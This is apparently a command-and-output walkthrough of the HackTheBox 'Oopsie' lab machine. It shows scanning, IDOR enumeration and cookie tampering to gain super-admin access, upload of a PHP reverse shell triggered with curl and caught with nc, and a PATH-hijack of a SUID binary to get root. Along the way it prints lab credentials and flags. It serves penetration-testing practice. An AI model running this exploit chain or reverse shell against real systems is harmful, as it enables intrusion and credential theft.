$ sudo nmap -p- -A -T4 10.10.10.28
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
$ nikto -h 10.10.10.28
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-10944: : CGI Directory found
+ OSVDB-10944: /cdn-cgi/login/: CGI Directory found
+ OSVDB-3233: /icons/README: Apache default file found.
+ 10293 requests: 0 error(s) and 10 item(s) reported on remote host
$ dirb http://10.10.10.28
---- Scanning URL: http://10.10.10.28/ ----
==> DIRECTORY: http://10.10.10.28/css/
==> DIRECTORY: http://10.10.10.28/fonts/
==> DIRECTORY: http://10.10.10.28/images/
+ http://10.10.10.28/index.php (CODE:200|SIZE:10932)
==> DIRECTORY: http://10.10.10.28/js/
+ http://10.10.10.28/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://10.10.10.28/themes/
==> DIRECTORY: http://10.10.10.28/uploads/
admin@megacorp.com
login http://10.10.10.28/cdn-cgi/login/ with admin/MEGACORP_4dm1n!!
http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
This action require super admin rights.
burpsuite
Start burpsuite, proxy then open brower type http://10.10.10.28. On the Target tab, we notice that Burp has passively spidered the website while processing the
request. We go /cdn-cgi/login and refresh on the Accounts page, which displays the user id for our current user, and intercept the request. We notice what seems to be a custom cookie implementation, comprising of the user value and role. We also notice the id parameter, which for our current admin user is 1 .
GET /cdn-cgi/login/admin.php?content=accounts&id=1 HTTP/1.1
Host: 10.10.10.28
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: user=34322; role=admin
Connection: close
It might be possible to brute force the id values, and display the user value for another user, such as the super admin account. We can do this using Burp's Intruder module. Click CTRL + i to sent the request to Intruder.
We press Clear to remove the pre-populated payload positions, select the Id value (1), and click Add . Next, click on the Payloads tab.
We can generate a sequential list of 1-100 using a simple bash loop.
$for i in `seq 1 100`; do echo $i; done
Paste the output into the Payloads box.
Next, click on the Options tab, and ensure that Follow Redirections is set to "Always", and select the option to "Process cookies in redirections".
Click on the Target tab, and then click Start attack . We sort responses by Length, and view the results.
http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=30
Repair Management System
Access ID Name Email
86575 super admin superadmin@megacorp.com
Let's try to access the Uploads page again, substituting our user value with the super admins 86575(2 times replacements).
http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
Repair Management System
Branding Image Uploads
kali@kali:~/0.htb/Starting_Point/Oopsie28$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php
upload the revervse shell rev.php
The file rev.php has been uploaded.
we can set up our listener and trigger a reverse shell using curl.
$ curl http://10.10.10.28/uploads/rev.php
kali@kali:~/0.htb/Starting_Point/Oopsie28$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.28] 39410
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:15:52 up 2:49, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
robert pts/0 10.10.16.41 21:31 1:36m 0.17s 0.08s /bin/bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm
$ cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
$ ls /var/www/html/cdn-cgi/login
admin.php
db.php
index.php
script.js
$ cat /var/www/html/cdn-cgi/login/db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
$
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id robert
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
www-data@oopsie:/$ find / -type f -group bugtracker 2>/dev/null
/usr/bin/bugtracker
www-data@oopsie:/$ ls -al /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
www-data@oopsie:/$ /usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied
www-data@oopsie:/$ su robert
Password:
robert@oopsie:/$
robert@oopsie:/$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 1
---------------
Binary package hint: ev-engine-lib
Version: 3.3.3-1
Reproduce:
When loading library in firmware it seems to be crashed
What you expected to happen:
Synchronized browsing to be enabled since it is enabled for that site.
What happened instead:
Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects.
robert@oopsie:/$ strings /usr/bin/bugtracker
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
strcpy
__isoc99_scanf
__stack_chk_fail
putchar
printf
strlen
malloc
strcat
system
geteuid
__cxa_finalize
__libc_start_main
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
------------------
: EV Bug Tracker :
------------------
Provide Bug ID:
---------------
cat /root/reports/
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7697
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
strcpy@@GLIBC_2.2.5
_edata
strlen@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
concat
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
malloc@@GLIBC_2.2.5
__bss_start
main
__isoc99_scanf@@GLIBC_2.7
strcat@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
robert@oopsie:/$ export PATH=/tmp:$PATH
robert@oopsie:/$ cd /tmp
robert@oopsie:/tmp$ echo '/bin/sh' > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ ls
cat
robert@oopsie:/tmp$ ls -la
total 12
drwxrwxrwt 2 root root 4096 May 2 14:41 .
drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
-rwxrwxr-x 1 robert robert 8 May 2 14:41 cat
robert@oopsie:/tmp$ /usr/bin/bugtracker
# id
uid=0(root) gid=1000(robert) groups=1000(robert),1001(bugtracker)
# cd /root
# ls -la
total 48
drwx------ 8 root root 4096 Mar 20 2020 .
drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
lrwxrwxrwx 1 root root 9 Jan 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jan 24 2020 .cache
drwxr-xr-x 3 root root 4096 Jan 25 2020 .config
drwx------ 3 root root 4096 Jan 24 2020 .gnupg
drwxr-xr-x 3 root root 4096 Jan 23 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 2 root root 4096 Jan 24 2020 reports
-rw-r--r-- 1 root root 33 Feb 25 2020 root.txt
drwx------ 2 root root 4096 Jan 23 2020 .ssh
-rw------- 1 root root 1325 Mar 20 2020 .viminfo
# cat root.txt
# less root.txt
# less root.txt
WARNING: terminal is not fully functional
af13b0bee69f8a877c3faf667f7beacf
kali@kali:~/0.htb/Starting_Point/Oopsie28$ ssh robert@10.10.10.28
robert@oopsie:~$
$ export PATH=/tmp:$PATH
robert@oopsie:/tmp$ /usr/bin/bugtracker
# ls -la
total 16
drwxr-xr-x 2 root root 4096 May 2 15:10 .
drwxr-xr-x 3 root root 4096 Jan 25 2020 ..
-rw-r--r-- 1 root root 646 Sep 11 2020 filezilla.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
<RecentServers>
<Server>
<Host>10.10.10.46</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass>
<Logontype>1</Logontype>
<TimezoneOffset>0</TimezoneOffset>
<PasvMode>MODE_DEFAULT</PasvMode>
<MaximumMultipleConnections>0</MaximumMultipleConnections>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3